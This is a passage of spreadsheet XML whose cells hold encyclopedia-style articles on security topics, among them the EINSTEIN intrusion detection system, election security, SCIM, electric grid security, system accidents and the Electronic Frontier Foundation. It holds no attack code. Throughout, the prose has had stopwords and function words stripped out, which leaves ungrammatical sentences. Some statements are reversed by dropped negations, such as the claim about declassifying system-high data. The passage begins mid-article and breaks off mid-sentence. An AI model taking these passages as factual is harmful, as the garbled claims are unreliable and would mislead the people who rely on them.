privacy individuals much. privacy privacy impact assessment (pia) einstein published 2008, gave general notice people u.s. federal networks. assumes internet users expect privacy "to" "from" addresses email addresses websites visit" service providers information routing. also assumes people least basic understanding computers communicate know limits privacy rights choose access federal networks. privacy 1974 apply einstein data system records generally contain personal information indexed queried names individual persons. first version also available 2004.dhs seeking approval einstein retention schedule flow records, alerts, specific network traffic related alert maintained three years, example case false alert, data deemed unrelated potentially collected error, deleted. according privacy assessment us-cert's 24x7 incident handling response center 2007, us-cert data provided authorized users "need know data business security purposes" including security analysts, system administrators certain contractors. incident data contact information never shared outside us-cert contact information analyzed. secure data, us-cert's center began certification accreditation process 2006 expected complete first quarter fiscal year 2007. march 2007, center retention schedule approved national archives records administration does, "disposition schedule"—its "records must considered permanent nothing deleted". april 2013, still retention schedule working "with nppd records manager develop disposition schedules". update issued 2016. 2020 federal government data breach einstein failed detect 2020 united states federal government data breach. also national security directive managed trusted internet protocol service adams, cinder (darpa) references external links "oree, william analysis united states computer emergency readiness team's (u.s. cert) einstein intrusion detection system, impact privacy" (pdf). us-cert (may 2008). "privacy impact assessment einstein (pdf). u.s. department homeland security. retrieved 2008-06-12. "thank privacy assessment". {{cite web}}: missing empty |url= (help) "privacy impact assessment 24x7 incident handling response center" (pdf). u.s. department homeland security. march 2007. retrieved 2008-05-14. "einstein". techtarget. retrieved 2008-05-14.</t>
  </si>
  <si>
    <t>Ekoparty</t>
  </si>
  <si>
    <t>ekoparty annual computer security conference brings together variety people interested information security. briefings take place regularly buenos aires, argentina. history ekoparty founded 2001 juan pablo daniel borgna, leonardo pigner, federico kirschbaum, jerónimo basaldúa francisco müller amato. addition talks, ekoparty different activities like workshops, wargames, wardriving, lockpicking challenges, forensics challenges. also hacker conference black briefings chaos communication congress references external links ekoparty homepage beyond defcon, must hacking conferences browser exploit against ssl/tls ekoparty</t>
  </si>
  <si>
    <t>System high mode</t>
  </si>
  <si>
    <t>system high mode, simply system high, security mode using automated information system (ais) pertains environment contains restricted data classified hierarchical scheme, secret, secret unclassified. system high pertains features information processed, specifically strength trustworthiness system. system high mode distinguished modes (such multilevel security) lack need system contribute protection separation unequal security classifications. particular, precludes features objects (e.g. content format) produced exposed operating system high mode criteria securely downgrade objects. result, information system high treated classified highest security level data ais. example, unclassified information exist secret system high computer must treated secret, therefore never shared unclassified destinations (unless downgraded reliable human review, risky lack omniscient humans.) there known technology securely declassify system high information automated means reliable features data trusted potentially corrupted system high host. when unreliable means used (including cross-domain solutions bypass guards) serious risk system exploitation bypass introduced. nevertheless, done resulting risk overlooked accepted. example: when daniel granted access computer system uses system high mode, daniel must valid security clearance information processed system valid "need know" some, necessary all, informations processes system. sources ncsc (1985). "trusted computer system evaluation criteria". national computer security center. (a.k.a. tcsec "orange book" 5200.28 std). cissp (2018). "certified information system security professional, official study guide". edition</t>
  </si>
  <si>
    <t>Election security</t>
  </si>
  <si>
    <t>election cybersecurity election security refers protection elections voting infrastructure cyberattack cyber threat including tampering infiltration voting machines equipment, election office networks practices, voter registration databases. 2020, rand corporation first release research describing russia's playbook interfering u.s. elections, developed machine-learning tools detect interference, tested strategies counter russian interference.cyber threats attacks elections voting infrastructure could carried insiders within voting jurisdiction, variety actors ranging nefarious nation-states, organized cyber criminals lone-wolf hackers. motives range desire influence election outcome, discrediting democratic processes, creating public distrust even political upheaval. united states united states characterized highly decentralized election administration system. elections constitutional responsibility state local election entities secretaries state, election directors, county clerks local level officials encompassing 6,000+ local subdivisions nationwide.however, election security characterized national security concern increasingly drawing involvement federal government entities u.s. department homeland security. early 2016, johnson, secretary homeland security designated elections “critical infrastructure” making subsector eligible receive prioritized cybersecurity assistance federal protections department homeland security. designation applies storage facilities, polling places, centralized vote tabulations locations used support election process, information communications technology include voter registration databases, voting machines, systems manage election process report display results behalf state local governments. particular, hackers falsifying official instructions election could affect voter turnout hackers falsifying online results election could discord. post 2016 election election security become major focus area debate recent years, especially since 2016 u.s. presidential election. 2017, confirmed u.s. foreign adversary, russia, attempted interfere 2016 u.s. presidential election multi-faceted approach intended undermine confidence [the american] democratic process." this included conducting cyber espionage political targets, launching propaganda “information operations” (io) campaigns social media, accessing elements multiple u.s. state local electoral boards.on september 2017, reported u.s. department homeland security (dhs) notified states targeted kremlin-backed hackers 2016 election. those states included alabama, alaska, colorado, connecticut, delaware, florida, illinois, maryland, minnesota, ohio, oklahoma, oregon, north dakota, pennsylvania, virginia, washington,2 arizona, california, iowa, texas, wisconsin. currently, hackers reportedly succeeded breaching voter registration system state: illinois.in aftermath 2016 hacking, growing bench national security cyber experts emerged noting russia potential threat. other actors including north korea, iran, organized criminals possess, individual hackers motives technical capability infiltrate interfere elections democratic operations. leaders experts warned future attack elections voting infrastructure russian-backed hackers others nefarious intent, seen 2016, likely 2018 beyond.one recommendation prevent disinformation fake election-related sites email spoofing local governments .gov domain names sites email addresses. these controlled federal government, authenticates legitimate government controls domain. many local governments .com top-level domain names; attacker could easily quickly altered copy site similar-sounding .com address using private registrar.in 2018 assessment state election security center american progress, state received based measurements seven election security factors. forty states received grade below. separate 2017 report center american progress outlines nine solutions states implement secure elections; including requiring paper ballots records every vote, replacement outdated voting equipment, conducting post election audits, enacting cybersecurity standards voting systems, pre-election testing voting equipment, threat assessments, coordination election security state federal agencies, allocating federal funds ensuring election security. europe russia's 2016 attempts interfere u.s. elections fits pattern similar incidents across europe least decade. cyberattacks ukraine, bulgaria, estonia, germany, france austria investigators attributed suspected kremlin-backed hackers appeared aimed influencing election results, sowing discord undermining trust public institutions include government agencies, media elected officials. role white hackers "white hat" hacker community also involved public debate. from july 27–30, 2017, defcon world's largest, longest running best-known hacker conference hosted “voting machine hacking village” annual conference vegas, nevada highlight election security vulnerabilities. event featured different pieces voting equipment used federal, state local u.s. elections made available white-hat hackers researchers purpose education, experimentation, demonstrate cyber vulnerabilities equipment. during 3-day event, thousands hackers, media elected officials witnessed hacking every piece equipment, first machine compromised minutes. voting machine hacked remotely configured play rick astley's song "never gonna give up." additional findings voting village published report issued defcon october 2017.the "voting village" brought back second year con, held vegas, august 9–12, 2018. 2018 event dramatically expanded inquiries include election environment, voter registration records election night reporting many humans machines middle. 2018 also featured greater variety voting machines, election officials, equipment, election system processes, election night reporting. voting village participants consisted hackers, security professionals, journalists, lawyers, academics, local, state federal government leaders. full report issued 2018 village findings press conference washington, held september 2018.[1] legislation policy variety experts interest groups emerged address u.s. voting infrastructure vulnerabilities support state local elections officials security efforts. from efforts come general policy ideas election security, including: implement universal paper ballots, marked hand read optical scanner, ensuring voter-verified paper audit trail (vvpat). phase touch-screen voting machines especially vulnerable direct-recording electronic (dre) devices update pollbooks electronic equipment used check-in voters. verify voting results requiring election officials conduct risk-limiting audits, statistical post-election audit certification final results. secure voting infrastructure, especially voter registration databases, using cyber hygiene tools critical security controls” nist's cybersecurity framework. call upon outside experts conduct cyber assessments dhs, white-hat hackers, cybersecurity vendors security researchers needed. provide resources training state local election leaders cyber maintenance on-going monitoring. promote information-sharing cyber threats incidents across entire voting industry. appropriate federal funding states implement infrastructure upgrades, audits, cyber hygiene measures. establish clear channels coordination local, state, federal agencies, including real-time sharing threat intelligence information. maintain dhs's designation elections critical infrastructure subsector. require institute pre-election threat assessment plan bolster technical support capacity state locals requesting assistance.federal legislation also introduced address concerns. first bipartisan congressional legislation protect administration federal elections cybersecurity threats secure elections 2261) introduced december 2017 senator james lankford (r-ok).the 2018 federal budget signed president donald trump) included $380m state funding improve election security. each state received standard payment usd, remaining $230m allocated state proportionally based voting population. security measures funded included improving cybersecurity (36.3% funds), purchase voting equipment (27.8%), improvement voter registration systems (13.7%), post election audits (5.6%), improving communications efforts (2%). also verified voting foundation references external links verified voting u.s. advocacy organization catalogs voting equipment used state</t>
  </si>
  <si>
    <t>Egress Software</t>
  </si>
  <si>
    <t>System for Cross-domain Identity Management</t>
  </si>
  <si>
    <t>system cross-domain identity management (scim) standard automating exchange user identity information identity domains, systems. example might company onboards employees separates existing employees, added removed company's electronic employee directory. scim could used automatically add/delete (or, provision/de-provision) accounts users external systems suite, office 365, salesforce.com. then, user account would exist external systems employee, user accounts former employees might longer exist systems. addition simple user-record management (creating deleting), scim also used share information user attributes, attribute schema, group membership. attributes could range user contact information group membership. group membership attribute values generally used manage user permissions. attribute values group assignments change, adding challenge maintaining relevant data across multiple identity domains.the scim standard grown popularity importance, organizations saas tools. large organization hundreds thousands hosted applications (internal external) related servers, databases file shares require user provisioning. without standard connection method, companies must write custom software connectors join systems system.scim uses standardised rest data formatted json xml. history first version, scim 1.0, released 2011 scim standard working group organized open foundation. 2011, transferred ietf, current standard, scim released ietf 2015.scim completed september 2015 published ietf rfcs 7643 7644. use-case document also available 7642.the standard implemented various software.the standard initially called simple cloud identity management (and still called places), name officially changed system cross-domain identity management (scim) ietf adopted it.interoperability demonstrated october, 2011, cloud identity summit, industry conference. there, user accounts provisioned de-provisioned across separate systems using scim standards, collection software vendors: okta, cyberark, ping identity, sailpoint, technology nexus unboundid. march 2012, ietf paris, interoperability tests continued vendors, joined salesforce.com, bcpsoft, wso2, gluu, courion (now secureauth) nine companies total.scim second standard exchanging user data, builds prior standards (e.g. spml, portablecontacts, vcards, ldap directory services) attempt simpler widely adopted solution cloud services providers.the scim standard growing popularity adopted numerous identity providers (e.g. azure active directory) well applications (e.g. dynamic signal, zscaler, dropbox, perimeter81). adoption standard grows, number tools available. standard leverages number open-source libraries facilitate development testing frameworks ensure endpoint compliance scim standard. references external links "scim status pages". ietf tools. this working group ietf defines standard. "scim: system cross-domain identity management". scim. 2011-08-01. retrieved 2020-09-15. this site dedicated standard explanations details implement standard. unger, (2011-10-22). "internet identity workshop october 18–20 mountain view". identity commons. archived original 2011-10-22. dingle, pamela (2019-10-03). "provisioning scim getting started". techcommunity.microsoft.com. retrieved 2020-09-15.</t>
  </si>
  <si>
    <t>Electric grid security</t>
  </si>
  <si>
    <t>electric grid security refer activities utilities, regulators, stakeholders play securing national electricity grid. american electrical grid going largest changes history, move smart grid technology. smart grid allows energy customers energy providers efficiently manage generate electricity. similar technologies, smart grid also introduces concerns security.utility owners operators (whether investor-owned, municipal, cooperative) typically responsible implementing system improvements regards cybersecurity. executives utilities industry beginning recognize business impact cybersecurity.the electric utility industry u.s. leads number initiatives help protect national electric grid threats. industry partners federal government, particularly national institute standards technology, north american electric reliability corporation, federal intelligence enforcement agencies.electric grids targets military terrorist activity. when american military leaders created first plan axis 1941, germany's electric grid target list. issue overview north american electrical power grid highly connected system. ongoing modernization grid generally referred "smart grid". reliability efficiency drivers development smart grid. another example ability electrical system incorporate renewable energy sources wind power geothermal power. issues electric grid security ongoing improvements modernizations created risk system. example, risk specifically comes integration digital communications computer infrastructure existing physical infrastructure power grid.according academic journal ieee security privacy magazine, "the smart grid uses intelligent transmission distribution networks deliver electricity. this approach aims improve electric system's reliability, security, efficiency two-way communication consumption data dynamic optimization electric-system operations, maintenance, planning." government oversight u.s., federal energy regulatory commission (ferc) charge cybersecurity standards bulk power system. system includes systems necessary operating interconnected grid.investor-owned utilities operate different authority, state public utility commissions. this falls outside ferc's jurisdiction. cybersecurity 2016, members russian hacker organization "grizzly steppe" infiltrated computer system vermont utility company, burlington electric, exposing vulnerability nation's electric grid attacks. hackers disrupt state's electric grid, however. burlington electric discovered malware code computer system connected grid.as 2018, evolutions taking place power economic sector. these evolutions could make harder utilities defend cyber threat. first, hackers become sophisticated attempts disrupt electric grids. "attacks targeted, including spear phishing efforts aimed individuals, shifting corporate networks include industrial control systems." second, grid becoming distributed connected. growing "internet things" world could make every device could potential vulnerability. terrorist attack risk 2006, 200,000 miles transmission lines higher existed united states. main problem impossible secure whole system terrorist attacks. scenario terrorist attack, however, would minimal would disrupt small portion overall grid. example, attack destroys regional transmission tower would temporary impact. modern-day electric grid system capable restoring equipment damaged natural disasters tornadoes, hurricanes, storms, earthquakes generally short period time. this resiliency national grid events. would difficult even well-organized large group terrorists cause physical damage small- moderate-scale tornado." potential solutions today utility industry advancing cybersecurity series initiatives. they partnering federal agencies. goal improve sector-wide resilience physical cyber threats. industry also working national institute standards technology, north american electric reliability corporation, federal intelligence enforcement agencies.in 2017, electric companies spent $57.2 billion grid security.in september 2018, brien sheahan, chairman illinois commerce commission member u.s. department energy (doe) nuclear energy advisory committee, robert powelson, former federal energy regulatory commission (ferc) commissioner, wrote published piece utility dive cyberthreats national power system require stronger national standards collaboration levels government. recent article, u.s. department homeland security confirmed russian hackers targeted control room's american public utilities. electric distribution system become networked together interconnected. critical public services depend system: water delivery, financial institutions, hospitals, public safety. prevent disruption network, sheahan powelson recommended national standards collaboration federal state energy regulators.some utility companies cybersecurity-specific practices teams. baltimore electric conducts regular drills employees. also shares cyber-threat related information industry government partners. duke energy together corporate incident response team devoted cybersecurity hours day. unit works closely government emergency management enforcement.some states cybersecurity procedures practices: jersey: utilities required together comprehensive cybersecurity plans. pennsylvania: utilities must keep physical cybersecurity, emergency response business continuity plans. they also report severe cyberattacks. texas: state's public utility commission conducts annual security audits.in december 2018, u.s. senators cory gardner michael bennet introduced legislation intended improve grid security nation-wide. bills would create million fund would distributed states develop energy security plans. legislation would also require u.s. energy department identify vulnerabilities cyberattacks nation's electrical power grid.in march 2019, donald trump issued executive order directed federal agencies prepare attacks involving electromagnetic pulse. 2020, issued executive order bans grid equipment manufactured foreign adversary. electricity subsector coordinating council electricity subsector coordinating council (escc) main liaison organization federal government electric power industry. mission coordinate efforts prepare for, respond national-level disasters threats critical infrastructure. escc composed electric company ceos trade association leaders segments industry. federal government counterparts include senior administration officials white house, relevant cabinet agencies, federal enforcement, national security organizations. also smart grids country high-voltage transformer fire barriers references further reading campbell, richard "electric grid cybersecurity." congressional research service. 2018-09-04. katz, jeff. grid security considerations utilities." securityintelligence. 2016-11-10. "framework improving critical infrastructure cybersecurity." national institute standards technology. 2014-02-12. gheorghiu, iulia. "what utilities growing need grid security?" utilitydive. 2018-05-22. "growing cyber threats demand comprehensive grid security." ibm.</t>
  </si>
  <si>
    <t>SIGINT (conference)</t>
  </si>
  <si>
    <t>sigint conference three-day conference held yearly social technical aspects digital society 2009 2013. organized chaos computer club held cologne, germany. conference featured lectures workshops various different topics. specifically wanted focus social political aspect technology hacker culture. conference officially discontinued january 2014. also chaos communication congress chaos communication camp references external links archived version conference website video recordings available majority talks: sigint13, sigint12, sigint10, sigint09</t>
  </si>
  <si>
    <t>System accident</t>
  </si>
  <si>
    <t>system accident normal accident) "unanticipated interaction multiple failures" complex system. this complexity either technology human organizations, frequently both. system accident easy hindsight, extremely difficult foresight simply many action pathways seriously consider them. charles perrow first developed ideas mid-1980s. william langewiesche late 1990s wrote, "the control operation riskiest technologies require organizations complex serious failures virtually guaranteed occur."safety systems sometimes added complexity leads type accident.once enterprise passes certain point size, many employees, specialization, backup systems, double-checking, detailed manuals, formal communication, employees easily recourse protocol, habit, "being right." rather like attempting watch complicated movie language unfamiliar with, narrative thread going lost. since real world accidents almost always multiple causes, phenomena groupthink also occurring time. particular, mark dysfunctional organization simply blame last person touched something. 2012 charles perrow wrote, normal accident [system accident] everyone tries hard play safe, unexpected interaction failures (because interactive complexity), causes cascade failures (because tight coupling)." charles perrow uses term normal accident emphasize that, given current level technology, accidents highly likely number years decades.james reason extended approach human reliability swiss cheese model, widely accepted aviation safety healthcare. there aspect animal devouring tail, formality effort exactly right actually make situation worse. example, organizational riga-ma-role involved adjusting changing conditions, employees likely delay reporting changes, "problems," unexpected conditions. these accidents often resemble rube goldberg devices small errors judgment, flaws technology, insignificant damages combine form emergent disaster. william langewiesche writes about, entire pretend reality includes unworkable chains command, unlearnable training programs, unreadable manuals, fiction regulations, checks, controls."an opposing idea high reliability organization. scott sagan scott sagan multiple publications discussing reliability complex systems, especially regarding nuclear weapons. limits safety (1993) provided extensive review close calls cold could resulted nuclear accident. possible system accidents apollo space flight, 1970 apollo review board: [introduction] found accident result chance malfunction statistical sense, rather resulted unusual combination mistakes, coupled somewhat deficient unforgiving design [emphasis added]. reviewing procedures flight, officials nasa, beech recognize possibility damage overheating. many officials aware extended heater operation. event, adequate thermostatic switches might expected protect tank." three mile island, 1979 charles perrow: resembled accidents nuclear plants high risk, complex highly interdependent operator-machine systems; none accidents caused management operator ineptness poor government regulation, though characteristics existed expected. maintained accident normal, complex systems bound multiple faults cannot avoided planning operators cannot immediately comprehend." valujet (airtran) 592, everglades, 1996 1996, valujet airlines flight 592, regularly scheduled flight miami international hartsfield–jackson atlanta, crashed minutes taking result fire cargo compartment caused improperly stored labeled hazardous cargo. people board died. airline poor safety record crash. accident brought widespread attention airline's management problems, including inadequate training employees proper handling hazardous materials. maintenance manual md-80 aircraft documented necessary procedures "correct" sense. however, huge neither helpful informative. 2008 financial institution near-meltdown 2014 monograph, economist alan blinder stated complicated financial instruments made hard potential investors judge whether price reasonable. section entitled "lesson excessive complexity anti-competitive, dangerous," stated, "but greater hazard come opacity. when investors understand risks inhere securities (examples: mezzanine tranche cdo-squared synthetic cdo,...), mistakes made--especially rating agencies tell triple-a, wit, safe enough grandma. when crash comes, losses therefore much larger investors dreamed imaginable. markets knows securities really worth. panic thus complexity source risk." sinking sewol (2014) sewol ferry sank april 2014 route inchon jeju south korea, killing passengers crew. carrying 2,142.7 tons cargo, double maximum allowance tons. ship record deferred maintenance falsification documents. week accident, incheon port authority received documentation sewol's regular captain, shin, warned owners problems. shin later claiming company threatened fire continued objections. substitute captain commanding ship time accident. possible future applications concept five-fold increase airplane safety since 1980s, flight systems sometimes switch unexpected "modes" article entitled "the human factor", william langewiesche talks 2009 crash france flight mid-atlantic. points that, since 1980s transition automated cockpit systems began, safety improved fivefold. langwiesche writes, privacy cockpit beyond public view, pilots relegated mundane roles system managers." quotes engineer earl wiener takes humorous statement attributed duchess windsor never rich thin, adds careful digital flight-guidance system." wiener says effect automation typically reduce workload light, increase heavy. boeing engineer delmar fadden said capacities added flight management systems, become impossibly expensive remove certification requirements. unused, sense lurk depths unseen.langewiesche cites industrial engineer nadine sarter writes "automation surprises," often related system modes pilot fully understand system switches own. fact, common questions asked cockpits today "what's now?" response this, langewiesche points fivefold increase safety writes, rationally advocate return glamour past." healthier interplay theory practice safety rules sometimes changed? from article accident model engineering safer systems," nancy leveson, safety science, april 2004:"however, instructions written procedures almost never followed exactly operators strive become efficient productive deal time pressures. even highly constrained high-risk environments nuclear power plants, modification instructions repeatedly found violation rules appears quite rational, given actual workload timing constraints operators must job. situations, basic conflict exists error seen deviation normative procedure error seen deviation rational normally used effective procedure (rasmussen pejtersen, 1994)." also unintended consequences references notes further reading cooper, alan (2004-03-05). inmates running asylum: high tech products drive crazy restore sanity. indianapolis: sams pearson education. isbn 0-672-31649-8. gross, michael joseph (may 2015). life death cirque soleil, this vanity fair article states: system accident requires many things wrong cascade. change element cascade accident well occur, every element shares blame. helmreich, robert (1994). "anatomy system accident: crash avianca flight 052". international journal aviation psychology. (3): 265–284. doi:10.1207/s15327108ijap0403_4. pmid 11539174. hopkins, andrew (june 2001). "was three mile island normal accident?" (pdf). journal contingencies crisis management. (2): 65–72. doi:10.1111/1468-5973.00155. archived original (pdf) august 2007. retrieved 2008-03-06. beyond engineering: thinking about technology, todd prote, karlene roberts, gene rochlin, oxford university press, 1997. this book provides counter-examples complex systems good safety records. pidgeon, nick (sept. 2011). retrospect: normal accidents," nature. perrow, charles (may 2000). "organizationally induced catastrophes" (pdf). institute study society environment. university corporation atmospheric research. retrieved february 2009. {{cite journal}}: cite journal requires |journal= (help) roush, wade edmund. catastrophe control: technological disasters enhance democracy, ph.d. dissertation, massachusetts institute technology, 1994, page normal accidents essential reading today industrial managers, organizational sociologists, historians technology, interested people alike, shows major strategy engineers used century keep hazardous technologies control—multiple layers "fail-safe" backup devices—often adds dangerous level unpredictability system whole. "test shows oxygen canisters sparking intense fire". cnn.com. 1996-11-19. retrieved 2008-03-06. wallace, brendan (2009-03-05). beyond human error. florida: press. isbn 978-0-8493-2718-6.</t>
  </si>
  <si>
    <t>Electronic Frontier Foundation</t>
  </si>
  <si>
    <t>electronic frontier foundation (eff) international non-profit digital rights group based francisco, california. foundation formed july 1990 john gilmore, john perry barlow mitch kapor promote internet civil liberties. provides funds legal defense court, presents amicus curiae briefs, defends individuals technologies considers abusive legal threats, works expose government malfeasance, provides guidance government courts, organizes political action mass mailings, supports technologies believes preserve personal freedoms online civil liberties, maintains database sites related news information, monitors challenges potential legislation believes would infringe personal liberties fair solicits list considers abusive patents intentions defeat considers without merit. history foundation electronic frontier foundation formed july 1990 john gilmore, john perry barlow mitch kapor response series actions enforcement agencies conclude authorities gravely uninformed emerging forms online communication, need increased protection internet civil liberties. april 1990, barlow visited u.s. federal bureau investigation agent relation theft distribution source code series macintosh roms. barlow described visit "complicated [the agent's] fairly complete unfamiliarity computer technology. realized right away could demonstrate innocence, would first explain guilt might be." barlow felt experience symptomatic "great paroxysm governmental confusion everyone's liberties would become risk".barlow posted account experience well online community contacted mitch kapor, similar experience. pair agreed need defend civil liberties internet. kapor agreed fund legal fees associated defense pair contacted york lawyers rabinowitz, boudin, standard, krinsky lieberman defending several computer hackers harper's magazine forum computers freedom target secret service raids. this generated large amount publicity offers financial support john gilmore steve wozniak. barlow kapor continued research conflicts government technology june 1990, barlow posted online influential article entitled "crime puzzlement" barlow announced kapor's plans create organization "raise disburse funds education, lobbying, litigation areas relating digital speech extension constitution cyberspace."this generated reaction support ideas barlow kapor. late june, barlow held series dinners francisco major figures computer industry develop coherent response perceived threats. barlow considered that: "the actions secret service symptoms growing social crisis: future shock. america entering information neither laws metaphors appropriate protection conveyance information itself." barlow felt confront formal organization would needed; hired cathy cook press coordinator, began would become electronic frontier foundation. electronic frontier foundation formally founded july 1990, kapor barlow, soon elected gilmore, wozniak, stewart brand join board directors. initial funding provided kapor, wozniak, anonymous benefactor.in 1990, mike godwin joined organization first staff counsel. then 1991, esther dyson jerry berman joined board directors. 1992, cliff figallo became director original office, december 1992, jerry berman became acting executive director organization whole, based second office. early cases creation organization motivated massive search seizure steve jackson games executed united states secret service early 1990. similar officially unconnected law-enforcement raids conducted across united states time part state–federal task force called operation sundevil. gurps cyberpunk, game company's projects, mistakenly labeled handbook computer crime, secret service raided offices steve jackson games. search warrant raid deemed hastily issued, games company soon claimed unauthorized access well tampering emails. while phone calls protected legislation, digital emails early concept considered fall right personal privacy. steve jackson games case eff's first high-profile case, major rallying point around began promoting computer- internet-related civil liberties.the eff's second case bernstein united states cindy cohn, programmer professor daniel bernstein sued government permission publish encryption software, snuffle, paper describing more recently, organization involved defending edward felten, lech johansen dmitry sklyarov. expansion development organization originally located mitch kapor's kapor enterprises offices. fall 1993, main offices consolidated single office, headed executive director jerry berman. during time, eff's attention focused influencing national policy, dislike members organization. 1994, berman parted ways formed center democracy technology, drew taubman briefly took reins executive director. 1995, auspices executive director lori fena, downsizing effort regroup refocus base support, organization moved offices francisco, california. there, took temporary residence john gilmore's toad hall, soon afterward moved hamm's building 1550 bryant after fena moved onto board directors while, organization briefly tara lemmey, followed barry steinhardt (who come closely allied technology liberty program american civil liberties union (aclu), eventually returned aclu). long eff's move offices shotwell sf's mission district, mike godwin departed, long-time legal director shari steele appointed executive director, staff attorney cindy cohn became legal director. spring 2006, announced opening office washington, d.c., staff attorneys. 2012, began fundraising campaign renovation building located eddy street francisco, serve headquarters. move completed april 2013. april 2015, shari steele stepped executive director. cindy cohn became executive director, corynne mcsherry became legal director, kurt opsahl became general counsel. cracker mid-1990s becoming seriously concerned refusal government license secure encryption product export unless utilized recovery claims governments could decrypt information protected data encryption standard (des), continuing even public breaking code first challenges. they coordinated supported construction cracker (nicknamed deep crack), using special purpose hardware software costing $210,000. this brought record breaking message hours july 1998 hours january 1999 conjunction distributed.net). published plans source code cracker. within four years advanced encryption standard standardized replacement des. activities legislative activity leading supporter email privacy act. litigation regularly brings defends lawsuits levels legal system pursuit goals objectives. long taken stance strategic lawsuits public participation (slapp) attempts stymie free speech advocated effective anti-slapp legislation. many significant technology cases involved eff, including studios, inc. grokster, ltd., apple does, others. patent busting project patent busting project electronic frontier foundation (eff) initiative challenging patents organization claims illegitimate suppress innovation limit online expression. initiative launched april 2004, involves phases: documenting damage caused patents, submitting challenges united states patent trademark office. enfranchisement activism long advocate paper audit trails voting machines testified support united states presidential election 2004. later, funded research hariprasad vemuru exposed vulnerabilities particular model. since 2008, operated vote live website database. staffed hotline volunteers, designed quickly document irregularities instances voter suppression occur election day.the active united states presidential election 2016 online phishing related controversy fabrication election results. alex halderman, computer security professor university michigan, wrote article published medium 2016 stating thought advisable recount election results states like wisconsin, michigan, pennsylvania, exclusively states hillary clinton lost. retaliation halderman, hacker sent anti-semitic racist emails students university michigan signed halderman. publicizes controversies promotes reduction online phishing. content moderation reform spring 2018, joined open technology institute (oti), center democracy technology, aclu foundation northern california four academics writing santa clara principles: transparency accountability content moderation. document sets following guidelines social networks. statistics removed posts publicly available. banned users users posts deleted notified clear reasons. such users opportunity appeal appeal read human.six months later, organizations sought support roughly others, including article calling facebook adopt santa clara principles. this later updated request facebook warn users interacted sock puppet enforcement accounts.in 2019, delivered testimony online harms white paper united kingdom. they commented several proposals increase amount regulation social media open abuse. also 2019, launched website "tossed out" document cases moderation rules applied inconsistently. cindy cohn underscored commitment upholding free speech online, writing "once you’ve turned whether pressure threats lawsuits, power silence people doesn’t direction." awards organizes sets awards promote work accordance goals objectives: pioneer awards awarded annually recognize individuals opinion "leaders extending freedom innovation electronic frontier." 2017, honorees chelsea manning, mike masnick annie game.the cooperative computing awards series four awards meant encourage ordinary internet users contribute solving huge scientific problems," awarded first individual group discovers prime number significant record number decimal digits. awards funded anonymous donor. awards are: $50,000 first individual group discovers prime number least 1,000,000 decimal digits awarded april 2000 $100,000 first individual group discovers prime number least 10,000,000 decimal digits awarded october 2009 $150,000 first individual group discovers prime number least 100,000,000 decimal digits $250,000 first individual group discovers prime number least 1,000,000,000 decimal digits. publications publishes several outlets online periodical effector, well websites, blogs, social networking services. eff's first book published 1993 dummy's guide internet, beginners' how-to manual contracted technical writer adam gaffin, made available free download many formats. press published paperback form 1994 everybody's guide internet (isbn 9780262571050). online edition updated regularly throughout 1990s early 2000s, translated dozens languages. organization's second book, protecting yourself online (isbn 9780062515124), overview digital civil liberties, written 1998 technical writer robert gelman communications director stanton mccandlish, published harpercollins. third book, cracking des: secrets encryption research, wiretap politics chip design (isbn 9781565925205), focusing eff's cracker project, published year o'reilly media. digital book, pwning tomorrow, anthology speculative fiction, produced 2015 part eff's 25th anniversary activities, includes contributions writers, including charlie jane anders, paolo bacigalupi, lauren beukes, david brin, cadigan, cory doctorow, neil gaiman, eileen gunn, kameron hurley, james patrick kelly, ramez naam, annalee newitz, hannu rajaniemi, rudy rucker, lewis shiner, bruce sterling, charles yu.the electronic frontier foundation's blog, deeplinks, major section main website eff.org. sent video message support global grassroots movement cryptoparty. software developed software browser add-ons, including switzerland, https everywhere, privacy badger. secure messaging scorecard conducted project named secure messaging scorecard "evaluated apps tools based seven specific criteria ranging whether messages encrypted transit whether code recently audited." april 2017, revised version development. support 2021, charity navigator given overall rating four four stars, including four stars financial efficiency capacity. financial 2014 million assets, received multiple grants donations million dollars history. february 2004, announced received bequest us$1.2 million estate member leonard zubkoff, software developer entrepreneur. used million money establish endowment fund digital civil liberties. beginning 2010, began regularly receiving income humble indie bundle. 2010, donations made eff's total revenue. between 2011 2014, amount received humble bundle reached $7.5 million total revenues.in 2011, received million google part settlement class action related privacy issues involving google buzz. electronic privacy information center seven privacy-focused nonprofits protested plaintiffs' lawyers google had, effect, arranged give majority funds organizations currently paid google lobby consult company". additional million obtained facebook similar settlement.in december 2014, adams charitable foundation granted million endowment fund adams chair internet rights. other agitprop group psychological industries independently issued buttons culture tropes logo laughing anime series ghost shell: stand alone complex (with original catcher quotation replaced slogan anonymous), bleeding roller derby jammer, it!" woman (often misidentified rosie riveter) series buttons behalf eff.in late june 2014 flew gefa-flug gd/4 blimp owned conjunction with, greenpeace nsa's bluffdale-based utah data center protest purported illegal spying. also notes references external links official website electronic frontier foundation's channel youtube eff's secure messaging scorecard (version 1.0) works electronic frontier foundation project gutenberg dummy's guide internet electronic frontier foundation. project gutenberg. works electronic frontier foundation internet archive "how bypass internet censorship". archived original 2014-12-19. also known titles: "bypassing internet censorship circumvention tools". flossmanuals.net. 2011-03-10. 240. archived original 2015-02-07. retrieved 2015-02-08.</t>
  </si>
  <si>
    <t>Electronic authentication</t>
  </si>
  <si>
    <t>electronic authentication process establishing confidence user identities electronically presented information system. digital authentication, e-authentication, used synonymously referring authentication process confirms certifies person's identity works. when used conjunction electronic signature, provide evidence whether data received tampered signed original sender. electronic authentication reduce risk fraud identity theft verifying person performing transactions online.various e-authentication methods used authenticate user's identify ranging password higher levels security utilize multifactor authentication (mfa). depending level security used, user might need prove identity security tokens, challenge questions, possession certificate third-party certificate authority attests identity. overview american national institute standards technology (nist) developed generic electronic authentication model provides basic framework authentication process accomplished regardless jurisdiction geographic region. according model, enrollment process begins individual applying credential service provider (csp). need prove applicant's identity proceeding transaction. once applicant's identity confirmed csp, receives status "subscriber", given authenticator, token credential, form username. responsible managing credential along subscriber's enrollment data life credential. subscriber tasked maintaining authenticators. example user normally uses specific computer online banking. attempts access bank account another computer, authenticator present. order gain access, subscriber would need verify identity csp, might form answering challenge question successfully given access. history need authentication prevalent throughout history. ancient times, people would identify contact physical appearance. sumerians ancient mesopotamia attested authenticity writings using seals embellished identifying symbols. time moved common provide authentication would handwritten signature. authentication factors there three generally accepted factors used establish digital identity electronic authentication, including: knowledge factor, something user knows, password, answers challenge questions, numbers pin. possession factor, something user has, mobile phone, token biometric factor, something user fingerprints, scan voice patternout three factors, biometric factor convenient convincing prove individual's identity, expensive implement. each factor weaknesses; hence, reliable strong authentication depends combining 